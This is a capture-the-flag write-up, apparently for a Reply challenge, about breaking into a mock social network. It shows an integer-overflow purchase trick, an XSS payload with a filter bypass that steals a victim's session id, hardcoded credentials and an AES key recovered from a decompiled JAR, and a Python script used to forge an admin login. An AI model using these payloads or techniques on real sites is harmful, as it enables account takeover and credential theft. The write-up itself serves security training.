This is a social media application in which we can buy subscriptions. The problem only 20€ in credits are available and the sub costs 30. Looking around there is an underflow on the cart -2,147,483,648 to 2,147,483,647 that is a integer of 4 bytes, some quick maths shows that at aprice per unit of 39 we need 55063684 units to go negative and then add another 55063684 to be positive again but below 20€
We are premium now and with the cool sub we have some new followers like BigFish the problem with this user is that he refused to go to our links so it wont help much as this user cant visit links,
The Idea is to leverage the xss on the profile page to grab the session id that is sitting on the bottom of the visits page:
<imimgg src=x onerror=alert(1) />
After checking my followers I found a new follower follow it back and liked his post so now I can chat with him. He will love to visit my xss:
This is going to be the payload to steal the sessid
a=new XMLHttpRequest();
a.open("GET",'/eab7d078f560ffad719388fde466d912980d6024/visits',!1);
a.send('');
x=a.responseText;
s=x.match(/id=\"sessid\">.{32}/g)
a.open("GET",'/eab7d078f560ffad719388fde466d912980d6024/profile/abtsecabt'+s,!1);
a.send('')The server is removing some strings after trial and error
<scscriptript>a=new XMLHttppReRequest();a.open("GET",'/eab7d078f560ffad719388fde466d912980d6024/visits',!1);a.send('');x=a.responsseTeText;s=x.match(/id=\"sessid\">.{32}/g);a.open("GET",'/eab7d078f560ffad719388fde466d912980d6024/profile/abtsecabt?'+s,!1);a.send('')</scscriptript>So After testing it against my self I got the payload right and its time to send it to the victim
And now we have his session id vnkyk87birxbiqs78excd1o23tf8w9gy
Now we are admins! Most of the features are now disabled but on saved messages there is an interesting link:
The link points to a jnlp file that contains a jar so lets use jd-gui to see whats inside, the code is pretty much a class login acting as a loggin wrapper on a hidden endpoint of the app:
public String performLogin(String paramString1, String paramString2) {
try {
URL uRL = new URL("http://gamebox3.reply.it/eab7d078f560ffad719388fde466d912980d6024/login");
HttpURLConnection httpURLConnection = (HttpURLConnection)uRL.openConnection();
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setDoOutput(true);
httpURLConnection.setRequestProperty("Authorization", "Basic ZmlzaDpQclJncW9WUSVRNnptakF4WFRqOwo=");
httpURLConnection.setRequestProperty("Content-Type", "application/json");
httpURLConnection.setRequestProperty("Accept", "application/json");
String str1 = "{\"username\": \"" + paramString1 + "\", \"password\": \"" + paramString2 + "\"}";
try (OutputStream null = httpURLConnection.getOutputStream()) {
byte[] arrayOfByte = str1.getBytes("utf-8");
outputStream.write(arrayOfByte, 0, arrayOfByte.length);
} catch (Exception exception) {
exception.printStackTrace();
return "Fail";
} Then we have a function to encrypt passwords with the key and the salt on it:
public static String encrypt(String paramString1, String paramString2) throws Exception {
byte[] arrayOfByte1 = getRandomIv();
String str = "ThisIsTheSuperSecretKey";
SecretKey secretKey = getSecretKey(str, paramString1);
Cipher cipher = initCipher(1, secretKey, arrayOfByte1);
byte[] arrayOfByte2 = cipher.doFinal(paramString2.getBytes());
byte[] arrayOfByte3 = ByteBuffer.allocate(arrayOfByte1.length + arrayOfByte2.length).put(arrayOfByte1).put(arrayOfByte2).array();
return Base64.getEncoder().encodeToString(arrayOfByte3);We can also notice the autorization bearer Basic ZmlzaDpQclJncW9WUSVRNnptakF4WFRqOwo=
That reveal the fish:PrRgqoVQ%Q6zmjAxXTj; so we will start by trying with those creds using a python script to encrypt with the same key and salt
import base64
import hashlib
from Cryptodome.Cipher import AES # from pycryptodomex
from Cryptodome.Random import get_random_bytes
HASH_NAME = "SHA256"
IV_LENGTH = 16
ITERATION_COUNT = 65536
KEY_LENGTH = 32
def pad(s): return s + (IV_LENGTH - len(s) % IV_LENGTH) * chr(IV_LENGTH - len(s) % IV_LENGTH)
def unpad(s): return s[0:-ord(s[-1:])]
def get_secret_key(password, salt):
return hashlib.pbkdf2_hmac(HASH_NAME, password.encode(), salt.encode(), ITERATION_COUNT, KEY_LENGTH)
def encrypt(password, salt, message):
secret = get_secret_key(password, salt)
message = pad(message)
iv = get_random_bytes(IV_LENGTH)
cipher = AES.new(secret, AES.MODE_CBC, iv)
cipher_bytes = base64.b64encode(iv + cipher.encrypt(message.encode("utf8")))
return bytes.decode(cipher_bytes)
def decrypt(password, salt, cipher_text):
secret = get_secret_key(password, salt)
decoded = base64.b64decode(cipher_text)
iv = decoded[:AES.block_size]
cipher = AES.new(secret, AES.MODE_CBC, iv)
original_bytes = unpad(cipher.decrypt(decoded[IV_LENGTH:]))
return bytes.decode(original_bytes)
f_salt = "aPinchOfSalt"
secret_key = "ThisIsTheSuperSecretKey"
plain_text = "PrRgqoVQ%Q6zmjAxXTj"
cipherText = encrypt(secret_key, f_salt, plain_text)
print("CipherText: " + cipherText)
decryptedMessage = decrypt(secret_key, f_salt, cipherText)
print("PlainText: " + decryptedMessage)Running it we had:
CipherText: JaarSP87i5SR+DU+4Ho6p8l/za1Q9G1n3da2WvN7j62kc9dNbEuUjiDHM2GTkgMJ
PlainText: PrRgqoVQ%Q6zmjAxXTj
If we build a request like the one in the java code we got this:
Admin:OfishIsTheBestSOCIALnEtWoRk1@
Lets encrypt that pass and try again
CipherText: t+BshbebV9p3IbgQFD4aeh193fWh/V2jkcMu90AinkRC/DZe16Pzyqh4oh1tk8zl
PlainText: OfishIsTheBestSOCIALnEtWoRk1@
And now we have the right credentials and the flag
